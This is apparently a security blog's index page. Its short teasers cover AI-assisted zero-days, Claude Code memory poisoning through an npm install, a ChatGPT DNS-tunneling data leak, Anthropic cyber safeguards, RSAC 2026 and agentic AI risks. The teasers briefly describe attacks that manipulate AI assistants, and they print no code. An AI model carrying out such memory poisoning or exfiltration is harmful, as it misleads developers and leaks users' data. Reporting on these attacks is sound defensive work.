Google’s threat researchers caught the first zero-day exploit they believe was built with AI assistance. The technique attackers used to get the AI to help is the part worth understanding.
Cisco’s AI Threat Research team showed how a single npm install can persistently poison Claude Code’s memory, turning a trusted coding assistant into a quiet source of insecure guidance. The technical details matter, and so do the governance gaps they expose.
Anthropic shipped Claude Opus 4.7 today as its most capable generally available model, but the cybersecurity story is bigger than the benchmarks. The model includes automated safeguards that block high-risk cyber requests, deliberately reduced offensive capabilities compared to Mythos Preview, and a new Cyber Verification Program that gates legitimate security use behind a formal application process. This is the first generally available model where Anthropic is actively testing the controls it needs before it can release Mythos-class capabilities to the public.
Anthropic launched Project Glasswing with 12 major tech companies, using its unreleased Claude Mythos Preview model to find and patch zero-day vulnerabilities at a scale and speed that didn’t exist six months ago. The implications for vulnerability management, patching cycles, and defensive security programs are enormous.
Check Point Research disclosed a ChatGPT vulnerability that used DNS tunneling to silently exfiltrate conversation data from an isolated runtime. The technique is decades old. The blind spot that enabled it is not.
RSAC 2026 opens today at the Moscone Center in San Francisco. I’m not there in person this year, but I’ve spent the past week tracking every pre-conference announcement, keynote preview, and vendor press release. There’s a lot to take in, so here’s my attempt to highlight what’s most relevant for practitioners this week.
The conference covers a wide range of ground this year. Post-quantum cryptography, supply chain security, social engineering, cloud security, governance under the EU AI Act, workforce burnout, and even vibe coding as an emerging security risk all have dedicated sessions and tracks. RSAC themselves identified seven key trends from this year’s submissions: MCP, agentic AI, vibe coding, identity, governance, addressing burnout, and the power of partnerships.
NHIs are the privileged service account problem reborn at 100x scale. Same mistakes, same inertia, same excuses. Except now the service account can reason, make decisions, and talk to other service accounts autonomously.
PCI DSS v4.x wasn’t written with AI in mind, but the framework is more adaptable than it gets credit for. Here’s where the standard holds up, where there’s room to grow, and how the PCI SSC is already engaging with AI through initiatives like The AI Exchange.
AI agents are no longer chatbots. They call APIs, execute code, and make decisions with real consequences. The OWASP Agentic Top 10 is the first industry framework built to address this new attack surface, and the numbers behind it should concern every security professional.
OpenClaw made remarkable security strides since my January article, hired dedicated security leadership, patched 40+ vulnerabilities, partnered with VirusTotal. Then ClawHavoc exposed 341 malicious skills. And now the founder just joined OpenAI. A breakdown of everything that changed, what still worries me, and how to think about deploying OpenClaw in this new reality.